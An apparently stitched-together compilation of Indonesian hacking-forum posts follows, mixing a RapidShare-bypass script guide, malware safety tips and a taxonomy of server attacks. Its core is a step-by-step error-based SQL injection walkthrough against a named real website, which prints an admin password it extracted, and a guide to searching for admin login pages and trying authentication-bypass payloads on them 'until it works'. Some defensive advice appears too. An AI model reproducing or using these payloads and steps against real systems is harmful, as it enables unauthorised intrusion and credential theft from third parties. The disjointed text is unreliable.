Quote: The hot new Firefox plug-in takes browser customization to a whole new level by letting users filter site content or change page behaviors.
The glory of open-source software is that it allows anyone with the inclination and the scripting knowledge to get under the hood and hot-rod their computing environment. But most of the time, that advantage is available only to people with the programming skills to make the changes they want. That's where Greasemonkey, a free plug-in for Firefox, comes in -- it simplifies hacking the browser.
Released at the end 2004, Greasemonkey is the latest in a growing arsenal of Firefox customization tools. It changes how look and act by altering the rendering process. Greasemonkey is to Firefox what aftermarket parts are to cars -- it lets you personalize your browser by making it faster and more powerful or simply by making browsing more aesthetically pleasing. How and why you will use Greasemonkey (and I predict you will, if you don't already) will depend on how you browse now. DOWNLOAD :
4) Right click on rapidshare.user.js and choose "Install User Script". Run FireFox.
Quote: From File Menu click on Open File then brouse to whereever you saved the 'greasemonkey.xpi' plug-in. Open it, wait a couple seconds for the install button becomes active. Click on it to install this plug-in then CLOSE FIREFOX. Run FireFox again. From the File Menu click on Open File then brouse to whereever you saved the 'rapidshare.user.js'. Open it. Click the Tools Menu then click on Install User Script then click OK. Close FireFox.
The script will let you enjoy "no wait" and multiple file downloads
SQL Injection Catatan : kita akan membatasi bahasan pada SQL Injection di MS-SQL Server.
Kita akan mengambil contoh di site www.pln-wilkaltim.co.id Ada dua kelemahan di site ini, yaitu: 1. Tabel News 2. Tabel Admin Langkah pertama, kita tentukan lubang mana yang bisa di-inject dengan jalan berjalan-jalan (enumeration) dulu di site tsb. Kita akan menemukan 2 model cara input parameter, yaitu dengan cara memasukkan lewat input box dan memasukkannya lewat alamat URL.
Kita ambil yang termudah dulu, dengan cara input box. Kemudian kita cari kotak login yang untuk admin. Ketemu di www.pln-wilkaltim.co.id/sipm/admin/admin.asp Langkah pertama untuk menentukan nama tabel dan fieldnya, kita inject kotak NIP dengan perintah (password terserah, cabang biarkan aja): ' having 1=1-- jangan lupa untuk menuliskan tanda kutip tunggal dan tanda minus dobel (penting). Arti kedua tanda tsb bisa anda cari di tutorial SQL Injection di www.neoteker.or.id ini (lihat arsip sebelumnya). Kemudian akan keluar pesan error: -------------------- Microsoft OLE DB Provider for ODBC Drivers (0x80040E14) [Microsoft][ODBC SQL Server Driver][SQL Server]Column 'T_ADMIN.NOMOR' is invalid in the select list because it is not contained in an aggregate function and there is no GROUP BY clause. /sipm/admin/dologin.asp, line 7 -------------------- Keluarlah nama field pertama kita !!! Catat nama tabel : T_ADMIN Catat nama field : NOMOR
Kemudian kita akan mencari nama field-field berikutnya, beserta nama tabel yang mungkin berbeda-beda. Kita inject di kotak NIP (password terserah): ' group by T_ADMIN.NOMOR having 1=1-- Akan keluar pesan error: -------------------- Microsoft OLE DB Provider for ODBC Drivers (0x80040E14) [Microsoft][ODBC SQL Server Driver][SQL Server]Column 'T_ADMIN.NIP' is invalid in the select list because it is not contained in either an aggregate function or the GROUP BY clause. /sipm/admin/dologin.asp, line 7 -------------------- Artinya itulah nama tabel dan field kedua kita. Catat : T_ADMIN.NIP
Kemudian kita cari field ke tiga : ' group by T_ADMIN.NOMOR,T_ADMIN.NIP having 1=1-- Akan keluar pesan error: -------------------- Microsoft OLE DB Provider for ODBC Drivers (0x80040E14) [Microsoft][ODBC SQL Server Driver][SQL Server]Column 'T_ADMIN.PASSWORD' is invalid in the select list because it is not contained in either an aggregate function or the GROUP BY clause. /sipm/admin/dologin.asp, line 7 -------------------- Catat field ke tiga : T_ADMIN.PASSWORD
Lakukan langkah di atas sampai kita menemukan field terakhir.
Berikut adalah pesan error yang terjadi, jika kita mengecek field terakhir dengan meng-inject: ' group by T_ADMIN.NOMOR,T_ADMIN.NIP,T_ADMIN.PASSWORD, T_ADMIN.NAMA,T_ADMIN.KD_RANTING,T_ADMIN.ADDRESS,T_ ADMIN.EMAIL having 1=1-- (catatan : kalimat harus 1 baris, tidak dipotong) -------------------- - NIP atau Password atau Unit Anda salah !! - -------------------- Sukses !!! Kita berhasil menemukan field terakhir. Daftar kolom (field): T_ADMIN.NOMOR T_ADMIN.NIP T_ADMIN.PASSWORD T_ADMIN.NAMA T_ADMIN.KD_RANTING T_ADMIN.ADDRESS T_ADMIN.EMAIL Hanya ada satu tabel untuk otentifikasi ini (yaitu T_ADMIN), ini akan mempermudah proses kita selanjutnya.
Langkah berikutnya, kita menentukan jenis struktur field- field tersebut di atas.
Kita inject di kotak NIP (pass terserah) : ' union select sum(NOMOR) from T_ADMIN-- Arti dari query tersebut adalah : kita coba menerapkan klausa sum sebelum menentukan apakah jumlah kolom-kolom di dua rowsets adalah sejenis. Bahasa mudahnya adalah kita memasukkan klausa sum (jumlah) yang berlaku untuk type kolom numerik, jadi untuk type kolom yang bukan numerik, akan keluar error yang bisa memberitahu kita jenis kolom yang dimaksud. Pesan error : -------------------- Microsoft OLE DB Provider for ODBC Drivers (0x80040E14) [Microsoft][ODBC SQL Server Driver][SQL Server]All queries in an SQL statement containing a UNION operator must have an equal number of expressions in their target lists. /sipm/admin/dologin.asp, line 7 -------------------- artinya kolom NOMOR berjenis numerik.
Berikutnya kita inject : ' union select sum(NIP) from T_ADMIN-- Akan keluar pesan error : -------------------- Microsoft OLE DB Provider for ODBC Drivers (0x80040E07) [Microsoft][ODBC SQL Server Driver][SQL Server]The sum or average aggregate operation cannot take a char data type as an argument. /sipm/admin/dologin.asp, line 7 -------------------- Artinya kolom NIP bertype char.
Kita harus mengulang perintah di atas untuk kolom yang berikutnya dengan jalan mengganti nama_kolom di : ' union select sum(nama_kolom) from T_ADMIN-- dengan kolom yang berikutnya. Kita peroleh 7 type kolom: T_ADMIN.NOMOR => numeric T_ADMIN.NIP => char T_ADMIN.PASSWORD => nvarchar T_ADMIN.NAMA => char T_ADMIN.KD_RANTING => char T_ADMIN.ADDRESS => nvarchar T_ADMIN.EMAIL => char
Langkah berikutnya, kita akan mencari isi kolom password, untuk user admin, dengan meng-inject : ' union select min(NAMA),1,1,1,1,1,1 from T_ADMIN where NAMA > 'a'-- artinya kita memilih minimum nama user yang lebih besar dari 'a' dan mencoba meng-konvert-nya ke tipe integer. Arti angka 1 sebanyak 6 kali itu adalah bahwa kita hanya memilih kolom NAMA, dan mengabaikan 6 kolom yang lain. Akan keluar pesan error : -------------------- Microsoft OLE DB Provider for ODBC Drivers (0x80040E07) [Microsoft][ODBC SQL Server Driver][SQL Server]Syntax error converting the varchar value 'bill ' to a column of data type int. /sipm/admin/dologin.asp, line 7 -------------------- Anda lihat : varchar value 'bill ' 'bill' itu adalah nama user di record yang terakhir dimasukkan, atau isi kolom NAMA di record yang terakhir dimasukkan.
Selanjutnya kita inject : ' union select min(PASSWORD),1,1,1,1,1,1 from T_ADMIN where NAMA = 'bill'-- catatan : harus sebaris (tidak dipotong). Akan keluar error : --------------------- Microsoft OLE DB Provider for ODBC Drivers (0x80040E07) [Microsoft][ODBC SQL Server Driver][SQL Server]Syntax error converting the nvarchar value 'm@mpusk@u' to a column of data type int. /sipm/admin/dologin.asp, line 7 --------------------- Artinya kita berhasil !!! Kita dapatkan [+] NAMA = bill [+] PASSWORD = m@mpusk@u
Silahkan login ke : www.pln-wilkaltim.co.id/sipm/admin/admin.asp dengan account di atas, sedang nama cabang, silahkan anda isi sendiri dengan cara coba-coba
Atau kita pakai jalan pintas saja....
Kita inject-kan : ' union select min(KD_RANTING),1,1,1,1,1,1 from T_ADMIN where NAMA ='bill'-- catatan : harus satu baris. Duarrrrrr.......... Glhodhak............. Langsung masuk ke menu admin. Ingat : jangan buat kerusakan ! beritahu sang admin !!!
Lubang ke dua adalah pada bagian berita. Pada dasarnya berita di situ adalah isi dari tabel yang lain lagi. Jadi tetep bisa kita inject !!! Bedanya, kita harus memasukkan parameter di alamat URL-nya. Contoh : http://www.pln-wilkaltim.co.id/dari_...&idm=40&idSM=2 ada parameter id dan idSM. Setelah kita coba inject, ternyata yang berpengaruh adalah parameter id aja (CMIIW).
Kita inject-kan : www.pln-wilkaltim.co.id/dari_Media.asp?id=2119' having 1=1-- akan keluar pesan error : --------------------------- Microsoft OLE DB Provider for ODBC Drivers (0x80040E14) [Microsoft][ODBC SQL Server Driver][SQL Server]Column 'tb_news.NewsId' is invalid in the select list because it is not contained in an aggregate function and there is no GROUP BY clause. /dari_Media.asp, line 58 --------------------------- artinya 'tb_news.NewsId' itulah nama tabel dan kolom kita yang pertama.
Ulangi langkah-langkah kita di atas sampai didapatkan : tb_news.NewsId => numeric tb_news.NewsCatId => numeric tb_news.EntryDate => datetime tb_news.Title => nvarchar tb_news.Content => tb_news.FotoLink => tb_news.FotoType => bit data tb_news.review => tb_news.sumber => char tb_news.dateagenda => datetime
Nah, selanjutnya adalah tugas anda sendiri untuk mengembangkan pengetahuan anda. Anda bisa men-insert berita yang bisa anda tentukan sendiri isinya.
Inilah mengapa hole di MS-SQL Server ini demikian berbahaya.
Perkiraan saya, nama-nama partai di situs KPU yang di-hack oleh Shizoprenic, juga ada di tabel-tabel suatu database, jadi tetep bisa dimasuki dengan cara SQL Injection ini.
************************************************** **** KHUSUS BUAT ADMIN & WEB PROGRAMMER !!! ************************************************** **** Cara pencegahan yang umum digunakan : 1. Batasi panjang input box (jika memungkinkan), dengan cara membatasinya di kode program, jadi si cracker pemula akan bingung sejenak melihat input box nya gak bisa di inject dengan perintah yang panjang. 2. Filter input yang dimasukkan oleh user, terutama penggunaan tanda kutip tunggal (Input Validation). 3. Matikan atau sembunyikan pesan-pesan error yang keluar dari SQL Server yang berjalan. 4. Matikan fasilitas-fasilitas standar seperti Stored Procedures, Extended Stored Procedures jika memungkinkan. 5. Ubah "Startup and run SQL Server" menggunakan low privilege user di SQL Server Security tab.
Yah itulah mungkin yang dapat saya ceritakan..... Hal itu adalah gambaran, betapa tidak amannya dunia internet... Kalau mau lebih aman, copot kabel jaringan anda, copot disk drive anda, copot harddisk anda, jual kompie anda !!! Just kidding )
Referensi : [+] sqlinjection, www.BlackAngels.it [+] anvanced sql injection in sql server applications (www.ngssoftware.com) [+] sql injection walktrough (www.securiteam.com)
1. SQL injection adalah sebuah aksi hacking yang dilakukan di aplikasi client dengan cara memodifikasi perintah SQL yang ada di memori aplikasi client. 2. SQL Injection merupakan teknik mengeksploitasi web aplikasi yang didalamnya menggunakan database untuk penyimpanan data.
Sebab terjadinya SQL Injection
1. Tidak adanya penanganan terhadap karakter – karakter tanda petik satu ’ dan juga karakter double minus -- yang menyebabkan suatu aplikasi dapat disisipi dengan perintah SQL. 2. Sehingga seorang Hacker menyisipkan perintah SQL kedalam suatu parameter maupun suatu form.
Bug SQL Injection berbahaya ?
1. Teknik ini memungkinkan seseorang dapat login kedalam sistem tanpa harus memiliki account. 2. Selain itu SQL injection juga memungkinkan seseorang merubah, menghapus, maupun menambahkan data–data yang berada didalam database. 3. Bahkan yang lebih berbahaya lagi yaitu mematikan database itu sendiri, sehingga tidak bisa memberi layanan kepada web server.
Apa saja yang diperlukan untuk melakukan SQL Injection ?
1. Internet Exploler / Browser 2. PC yang terhubung internet 3. Program atau software seperti softice
Contoh sintaks SQL Injection
Contoh sintak SQL dalam PHP
1. $SQL = “select * from login where username =’$username’ and password = ‘$password’”; , {dari GET atau POST variable } 2. isikan password dengan string ’ or ’’ = ’ 3. hasilnya maka SQL akan seperti ini = “select * from login where username = ’$username’ and password=’pass’ or ‘=′”; , { dengan SQL ini hasil selection akan selalu TRUE } 4. maka kita bisa inject sintax SQL (dalam hal ini OR) kedalam SQL
Gambar contoh SQL Injection
Contoh sintaks SQL Injection
1. Sintaks SQL string ‘-- setelah nama username 2. Query database awal :
Berubah menjadi :
Contoh sintaks SQL Injection
SQL Injection melalui URL, contohnya :
Penanganan SQL Injection
1. Merubah script php 2. Menggunakan MySQL_escape_string 3. Pemfilteran karakter ‘ dengan memodifikasi php.ini
1. Merubah script php
Contoh script php semula :
$query = "select id,name,email,password,type,block from user " .
"where email = '$Email' and password = '$Password'";
Script diatas memungkinkan seseorang dapat login dengan menyisipkan perintah SQL kedalam form login. Ketika hacker menyisipkan karakter ’ or ’’ = ’ kedalam form email dan password maka akan terbentuk query sebagai berikut :
Maka dilakukan perubahan script menjadi :
$query = "select id,name,email,password,type,block from user".
Merubah string yang mengandung karakter ‘ menjadi \’ misal SQL injec’tion menjadi SQL injec\’tion
Contoh : $kar = “SQL injec’tion”;
$filter = mySQL_escape_string($kar);
echo”Hasil filter : $filter”;
Hasilnya :
3. Pemfilteran karakter ‘ dengan memodifikasi php.ini
Modifikasi dilakukan dengan mengenablekan variabel magic_quotes pada php.ini sehingga menyebabkan string maupun karakter ‘ diubah menjadi \’ secara otomatis oleh php
Contoh :
Contoh script yang membatasi karakter yang bisa masukkan :
function validatepassword( input ) good_password_chars = "abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ"
validatepassword = true for i = 1 to len( input )
c = mid( input, i, 1 ) if ( InStr( good_password_chars, c ) = 0 ) then validatepassword = false exit function end if next end function
Implementasi SQL Injection
1. Masuk ke google atau browse yg lain 2. Masukkan salah satu keyword berikut
"/admin.asp" "/login.asp" "/logon.asp" "/adminlogin.asp" "/adminlogon.asp" "/admin_login.asp" "/admin_logon.asp" "/admin/admin.asp" "/admin/login.asp" "/admin/logon.asp" {anda bisa menambahi sendiri sesuai keinginan anda}
3. Bukalah salah satu link yang ditemukan oleh google, kemungkinan Anda akan menjumpai sebuah halaman login (user name danpassword). 4. Masukkan kode berikut :
User name : ` or `a'='a Password : ` or `a'='a (termasuk tanda petiknya)
5. Jika berhasil, kemungkinan Anda akan masuk ke admin panel, di mana Anda bisa menambahkan berita, mengedit user yang lain, merubah about, dan lain-lain. Jika beruntung Anda bisa mendapatkan daftar kredit card yang banyak. 6. Jika tidak berhasil, cobalah mencari link yang lain yang ditemukan oleh google. 7. Banyak variasi kode yang mungkin, antara lain :
User name : admin Password : ` or `a'='a atau bisa dimasukkan ke dua–duanya misal :
‘ or 0=0 -- ; “ or 0=0 -- ; or 0=0 -- ; ‘ or 0=0 # ;
“ or 0=0 # ; ‘ or’x’=’x ; “ or “x”=”x ; ‘) or (‘x’=’x
8. Cobalah sampai berhasil hingga anda bisa masuk ke admin panel
Cara pencegahan SQL INJECTION
1. Batasi panjang input box (jika memungkinkan), dengan cara membatasinya di kode program, jadi si cracker pemula akan bingung sejenak melihat input box nya gak bisa diinject dengan perintah yang panjang. 2. Filter input yang dimasukkan oleh user, terutama penggunaan tanda kutip tunggal (Input Validation). 3. Matikan atau sembunyikan pesan-pesan error yang keluar dari SQL Server yang berjalan. 4. Matikan fasilitas-fasilitas standar seperti Stored Procedures, Extended Stored Procedures jika memungkinkan. 5. Ubah "Startup and run SQL Server" menggunakan low privilege user di SQL Server Security tab.
Hacking adalah seni. Hacking adalah perpaduan dari pengetahuan, kreatifitas dan kesabaran. Jika Anda memiliki ketiga-tiganya Anda akan berhasil.
Script Kiddie: Seperti juga Lamers, mereka hanya mempunyai pengetahuan teknis networking yang sangat minimal. Biasanya tidak lepas dari GUI. Hacking dilakukan menggunakan trojan untuk menakuti & menyusahkan hidup sebagian pengguna Internet. (Istilah dari Onno W. purbo) masih Lanjut....
----
o0 Pertama sekali mengenal istilah h4cking ada perasaan sangat senang, senang yang tak terbatas, seorang teman mengatakan H4cker itu “jag0″ mereka bisa membuat virus, menyebarkannya , bisa memasuki semua komputer orang yang terhubung ke jaringan, mengendalikannya dan menjadikannya milik sendiri…. W00w sehebat itukah hacker?
Perasaan ingin tau itu semakin menggebu dikala membaca berita bahwa seorang remaja berhasil membobol sistem komputer “pentag0n”,hal ini membuat otakku berfikir ternyata seorang remaja pun bisa melakukan itu .. hMMM. “Apakah gampang jadi hacxer?”
o1 Jam demi jam kuhabiskan di wArnet, mencari cari disemua situs situs penyedia jasa pencarian (se4rch 3nggine) dengan berbagai kata kunci “HAcking” ,”hack”, “membobol komputer orang” “membuat virus” “bagaimana memasuki sistem “ tak bisa kuingat berapa kata atau frasa yang kujadikan kunci untuk mencari….. beberapa disketkupun dipenuhi dengan semua hasil dari pencarian yang aku sendiripun belum yakin apa itu yang kucari.
o2 Yup… hari ini aku berselancar lagi, dengan kebingungan yang sama, tetapi dengan sedikit perasaan lega ,karena telah berhasil mengirimkan bom email ke alamat email temanku yang berteriak-teriak di warnet karena emailnya dipenuhi dengan “sampah”. aku kembali berkomunikasi di #irc dengan maksud menemuk4n yang kucari… setidaknya memuaskan perasaanku. tetapi lagi lagi yang kutemukan adalah tumpukan tools-tools yang terbuat dari berbagai bahasa pemrograman yang aku sendiri tak mengerti “apa itu pemrograman? “ dan “bagaimana bisa membuat program? ” hal ini tak pernah aku pikirkan, yang aku tau adalah masukkan alamat target dan tinggal klik.kalau beruntung programnya bener maka yang kuinginkan bisa tercapai,”so!buat apa bisa program!”, tinggal jalanin program kecil yang gratis di internet…
o3 Trojan! hmm, program menarik yang menyita hampir setiap hariku… tidak tau berapa banyak trojan yang aku koleksi, yang terpenting adalah aku bisa mengisengi temanku yang sedang mengerjakan “word”nya dengan cara mematikan PC yang sedang dia gunakan.berhari-hari aku menyibukkan diriku dengan kesenangan menggunakan program k3cil yang disebut trojan ini, ironisnya “trojan” sendiri aku tak mengerti artinya apalagi cara kerja dan gimana membuatnya , tapi itu bukan masalah buatku. yang penting aku sudah bisa berbangga didepan teman2ku.
o4 “www.xyx.com” tampilannya diubah…. woww… kok bisa ya, hebat!!, keren!bisa merubah tampilan web orang! maka, yang kulakukan selanjutnya menghabiskan waktuku untuk “surfing” di internet mencari bagaimana caranya mendeface situs web, cari dan download semua tool-tools yang ada..dan dimulailah kegiatanku.. jalankan semua tools yang ada, cari kelemahannya..hingga temukan sesuatu….. berhari-hari kucoba lagi kucoba lagi,belum nampak jelas ada tanda tanda bahwa semua yang kulakukan berhasil. Sampai aku memutuskan untuk berhenti melakukan seluruhnya, memang b3nar2 ironis;
o5 Tak terasa sudah ber-ribu hari hal itu kulakukan,hingga akhirnya seorang teman bertanya padaku.”apakah aku tau siapa itu hacker?”dengan bangga aku beri tahu dia semua yang kutau… begini begitu, tetapi dia malah tertawa2, dan dia katakan padaku, itu bukan hacker, … woops lalu apa? “how 2 become a hacker” karya Eric S.Raymond adalah rujukan yang dia berikan padaku..
o6 Apakah aku hacker? kalo dulu dengan bangga aku menyebut diriku hacker……. Sekarang? TCP-ip pun aku gak tau, Pemrograman aku gak bisa, apalagi mengenai Operating sytem,apapula itu Open source, kern3l, Shell code bla..bla bla… semua yang aku dapatkan dan kulakukan dulu apa? “script kiddies”
…………………………………………l0l……………………..
hacker Hacker adalah: Seseorang yang tertarik untuk mengetahui secara mendalam mengenai kerja suatu system,komputer,atau jaringan komputer.”
[ *RFC1392,Internet User Glossary ]
ini yang kucari, ini yang kuinginkan.. apa yang harus kulakukan? ………..
*STOP HERE! ini lebih kearah cerita pendek ya :P , aku bos3n juga buat artikel tentang teknik2 melulu apalag1 dah banyak banget artikel temen2 yang bagus banget buat dibaca..maka, sekali-=sekali gak ada salahnya kubuat artikel yang bersifat… “apa ya namanya” && pokoknya semua yang kutulis cuma sebagai ilustrasi kehidupan seorang “kiddies”yang membuatku merasa gak perlu menjadi “kiddies” & tidak ada suatu maksud apapun juga dibaliknya kecuali demi kemajuan bersama… semua t3rserah anda!
“indahnya dunia akan kau ketahui bila kau bisa meghiasinya” [c0m3t]
Sebagai contoh, Anda men-download program dan poster yang mengklaim bahwa itu adalah bersih-bersih bot controller. Jika kita dapat ini, akan muncul dengan hasil seperti "Win32/RBot" dll. Ini berarti bahwa file harus apa yang kita inginkan.
Sekarang, jika scan botnet-controller muncul sebagai sesuatu seperti:
"Win32 /trojan.agent.a", Kita bisa mengatakan bahwa ini adalah program berbahaya yang akan bekerja melawan kita. Ini adalah contoh dari download anda tidak ingin menggunakan.
Semua dalam semua, scan harus menunjukkan hasil yang serupa dengan apa yang Anda men-download. Anda harus selalu berhati-hati apa yang Anda download. Anda mungkin sering dapat men-download perangkat lunak berbahaya tanpa menyadarinya kadang-kadang.
Contoh ini akan menjadi "Windows XP Theme - 350kb!" padahal seharusnya jauh lebih tinggi, seperti 30-50mb.
Ingatlah untuk selalu memeriksa nama-nama file yang Anda download .. Jika Anda men-download program retak, itu akan luar biasa karena tidak memiliki kredit atau iklan di dalamnya. Saya akan percaya " 'x' retak oleh 'y'" lebih daripada yang saya percaya " 'x' retak". Kredit, nama atau iklan harus hampir selalu berada dalam. Gp atau. Zip file, ini adalah salah satu cara yang baik untuk mengenali yang terpercaya download.
Berikut adalah kutipan dari Wikipedia yang mungkin dapat membantu: "Contoh: ZTreeWin_1.5.zip mengandung celah untuk mendaftar ZtreeWin 1,51 file termasuk: keygen.exe, one.nfo, file_id.diz dan 'RUN.EXE'. Ini adalah 'RUN.EXE' yang berisi program jahat"
Men-download benar-benar tidak perlu dan sering berisiko, tetapi saya telah dan akan terus memposting beberapa konten bersih di sini, di EH Forum untuk kalian semua.
Online File Scanner
Web-scanner seperti "VirusTotal" dan "NoVirusThanks" menjadi semakin populer dengan jumlah diposting anonim download seluruh internet.
Jika Anda ingin memindai file Anda menemukan curiga, Anda bisa pergi ke salah satu http://virustotal.com atau http://novirusthanks.org untuk melakukannya.
VirusTotal akan mengirimkan sampel file ke perusahaan antivirus, sehingga hal ini tidak dianjurkan jika Anda ingin menyimpan file Anda tidak terdeteksi.
NoVirusThanks memiliki "Pilihan lanjutan"Area di mana Anda dapat memilih untuk tidak mendistribusikan file Anda ke perusahaan antivirus, ini berguna untuk menjaga hal-hal sepenuhnya tidak terdeteksi, tapi kalau file anda tidak mempercayai dan tidak ingin diri sendiri atau orang lain untuk menjadi terinfeksi dalam masa depan, saya sarankan Anda mengizinkan mereka untuk mendistribusikannya ke perusahaan antivirus.
Mengunjungi Website & Membaca Email.
Berhati-hati dari situs yang Anda kunjungi. Saya tidak akan merekomendasikan mengunjungi situs Web apapun yang kelihatannya murah, jarang, atau host secara bebas. Jahat website sering menyesatkan atau bisa saja menyuntikkan sesuatu ke dalam sistem anda tanpa persetujuan anda. Jika anda menggunakan "Chrome" browser dari Google, Anda mungkin telah memperhatikan bahwa file-file download secara otomatis tanpa disuruh Anda. Chrome adalah browser saya tidak merekomendasikan hanya karena begitu baru, semua hal-hal baru memiliki kerentanan, dan jika kerentanan dapat dieksploitasi, maka akan dieksploitasi.
Ketika membuka email, Anda juga harus hati-hati. Hanya karena itu email dari teman Anda - itu tidak berarti Anda bisa percaya itu! Anda mungkin melihat beberapa email yang meminta Anda untuk memperbarui rincian bank - bank Anda tidak boleh meminta Anda untuk melakukan hal itu melalui email. Rincian yang Anda masukkan akan dikirim ke seseorang yang akan mengeksploitasi rincian Anda, sehingga menjauhi email ini.
Cacing dapat menyebar melalui email. Sebagai contoh, Anda membuka email dari Bob berisi cacing, cacing ini kemudian dikirim ke semua kontak Anda. Ini adalah cara paling cacing akan bekerja, dan disarankan agar Anda mengubah layanan email Anda jika itu bisa rentan. Anda dapat menggunakan hotmail live Microsoft layanan yang sangat baik, juga akan menonaktifkan konten berbahaya dari men-download ke komputer Anda. Anda dapat menemukan layanan ini di http://mail.live.com
Sandboxing
Dengan menggunakan kotak pasir, segala sesuatu yang di-download ke komputer Anda akan tetap berada di kotak pasir. Tidak akan melarikan diri, yang berarti bahwa berbahaya mingguan tidak dapat membahayakan komputer Anda. Sandboxing adalah cara yang baik untuk menguji apakah suatu situs web dapat dipercaya.
Berikut adalah download untuk Sand Box saya gunakan: http://sandboxie.com/
Firewall
Antiviruses yang baik akan memiliki built-in Firewall, tetapi jika tidak, maka mungkin patut men-download satu. Firewall tidak penting, tetapi dapat membantu banyak. Beberapa firewall memiliki IP masking pilihan, tetapi ini biasanya dapat memperlambat komputer Anda dan tidak layak menggunakan kecuali Anda melakukan sesuatu yang ilegal.
Penggunaan utama dari firewall adalah untuk mencegah lalu lintas masuk, yang akan menghentikan hal-hal seperti 'telnet' dari mencapai koneksi Anda, dan juga dapat menghentikan cacing dan lain-lain dari mengakses jaringan Anda. Firewall juga akan memblokir backdoors itu trojans membuat, jadi jika Anda menemukan diri Anda cukup beruntung untuk memiliki RAT (Remote Access Trojan) Di komputer Anda, harus backdoor yang diblokir oleh firewall anda, tapi mungkin untuk trojan untuk mem-bypass.
Memiliki firewall tidak berarti Anda aman, banyak firewall dapat dengan mudah dinonaktifkan atau dilewati oleh malware. Beberapa firewall juga akan memblokir koneksi legit, seperti download untuk perangkat lunak. Jangan berpikir Anda aman hanya karena Anda memiliki firewall, ini adalah kesalahpahaman umum dengan firewall.
Terlalu banyak orang berpikir bahwa dengan menginstal firewall yang sangat populer, mereka akan segera merasa aman terhadap gangguan terbaru, tapi ini sama sekali tidak benar. Firewall dapat juga membuat efek pada kecepatan koneksi Anda. Jika Anda memiliki kecepatan download sangat cepat, Anda mungkin akan melihat perbedaan ketika Anda mendapatkan firewall, tetapi kecepatan download akan tetap normal pada pengguna dengan kecepatan lebih lambat. Efek ini dapat beragam di antara pengguna, dan tergantung pada sambungan.
Lebih baik untuk mencoba beberapa firewall untuk mencari tahu mana yang paling cocok bagi Anda - tinjauan bersifat pribadi dan tidak akan selalu sama untuk setiap orang.
Firewall besar "Comodo" yang juga gratis dapat ditemukan di sini ...
Comodo: http://www.personalfirewall.comodo.com/ Zone Alarm: http://www.zonealarm.com/store/content/c...wall_b.jsp Ghost: http://www.ghostsecurity.com/ghostwall/
Antiviruses
Anti-virus program adalah sangat penting. Anda jujur tidak boleh pergi tanpa satu. Jika Anda tidak memiliki satu, ada daftar download dan rekomendasi dalam posting berikutnya. Jangan khawatir mengenai anti-virus memperlambat komputer Anda, jika Anda mendapatkan yang benar maka komputer Anda akan tetap pada performa maksimal.
Anda ingin antivirus yang akan memindai folder sistem RAM dan terus-menerus, karena dengan begitu Anda akan diberitahu jika sesuatu yang berbahaya telah ditemukan di dalamnya. Antivirus rata-rata hanya akan memindai dan menghapus ketika diberitahu, tapi yang terbaik akan memindai terus-menerus, update setiap hari, dan memberikan banyak pilihan untuk mengutak-atik sesuai dengan preferensi Anda.
Jika ada program berbahaya yang ingin Anda download seperti Metasploit, akan lebih baik jika Anda memiliki antivirus yang akan memungkinkan Anda untuk melakukannya. Beberapa program antivirus tidak akan memberikan pilihan dan akan karantina file langsung, tetapi yang lain seperti Kaspersky akan memberi Anda pilihan untuk membersihkan, menghapus atau mengabaikan.
Virus kadang-kadang bisa sepenuhnya menonaktifkan perlindungan Anda, tetapi yang lebih kuat NOD32 program-program seperti ini dapat bertahan dan akan uncompromisable. Anda ingin sesuatu yang sulit jika Anda akan men-download riskware.
Sebuah anti virus yang baik juga akan terus-menerus memindai download dan menjalankan proses. Mudah-mudahan Anda dapat memahami sekarang mengapa ini sangat penting.
Satu-satunya program yang berhubungan dengan antivirus Aku telah terinstal pada saat ini adalah Avast! (Free) Malwarebytes Anti-Malware dan SUPERantispyware (Bicara demi dirinya sendiri ..).
Saya suka menggunakan HijackThis untuk melihat apa yang berjalan di komputer saya, dan saya selalu menjaga ComboFix hanya membungkus, Anda tidak pernah tahu apa yang di tikungan ... Aku ingat tidak mempunyai terinstal perangkat lunak antivirus apa pun, dan kemudian aku menerima root-kit yang tidak akan membiarkan saya mendownload software apapun .. Aku menyingkirkan mereka pada akhirnya, tapi itu tidak mudah, rootkit tidak terdeteksi oleh sebagian besar AV karena itu menjadi begitu baru / langka - Anda masih tidak dapat menemukannya di beberapa AV database! Tapi aku berharap aku punya lagi, jadi aku bisa mengirimkannya sebagai sampel.
Saya akan daftar favorit saya anti-virus di posting berikutnya. Saya sangat merekomendasikan Anda tetap ini, karena terdapat banyak yang palsu bahwa Anda dapat dengan mudah menuju.
Ingatlah untuk melihat hal-hal sebelum men-download mereka. Pilih dengan bijak!
Dalam dunia hacking (tepatnya cracking ding!?) dikenal beberapa jenis serangan terhadap server. Berikut ini jenis-jenis serangan dasar yang dapat dikelompokkan dalam minimal 6 kelas, yaitu:
Intrusion
Pada jenis serangan ini seorang cracker (umumnya sudah level hacker) akan dapat menggunakan sistem komputer server. Serangan ini lebih terfokus pada full access granted dan tidak bertujuan merusak. Jenis serangan ini pula yg diterapkan oleh para hacker untuk menguji keamanan sistem jaringan mereka. Dilakukan dalam beberapa tahap dan tidak dalam skema kerja spesifik pada setiap serangannya (dijelaskan pada artikel lain). Hacking is an Art!? =)
Denial of Services (DoS)
Penyerangan pada jenis DoS mengakibatkan layanan server mengalami stuck karena kebanjiran request oleh mesin penyerang. Pada contoh kasus Distributed Denial of Services (DDoS)misalnya; dengan menggunakan mesin-mesin zombie, sang penyerang akan melakukan packeting request pada server secara serentak asimetris dan simultan sehingga buffer server akan kelabakan menjawabnya!? Stuck/hung akan menimpa server. Jadi bukan server lagi namanya!? (servicenya mati masak dibilang server? hehehe....)
Joyrider
Nah, ini namanya serangan iseng!? Karena kebanyakan baca novel-novel hacking dan gak bisa belajar benar, isenglah jadinya nyoba-nyoba nyerang pake ilmu-ilmu instan super cepat (istilahnya 'onani' dimesin orang). Atau dengan alasan pengen tau isinya mesin orang!? =). Yang jelas serangan jenis ini rata-rata karena rasa ingin tau, tapi ada juga yang sampe menyebabkan kerusakan atau kehilangan data.
Vandal
Jenis serangan spesialis pengrusak!? nothing else to explain mbah!? =)
Scorekeeper
Serangan yang bertujuan mencapai reputasi hasil cracking terbanyak. Biasanya hanya berbentuk deface halaman web (index/nambah halaman) dengan memampangakan NickName dan kelompok tertentu. Sebagian besar masih tidak perduli dengan isi mesin sasarannya =). Saat ini jenis penyerang ini lebih dikenal dengan sebutan WannaBe/Script kiddies.
Spy
Tiga hurup saja. Jenis serangan untuk memperoleh data atau informasi rahasia dari mesin target. Biasanya menyerang pada mesin-mesin dengan aplikasi database didalamnya. Kadang kala suatu perusahaan menyewa 'mata-mata' untuk mencuri data perusahaan rivalnya
1. IP Spoofing
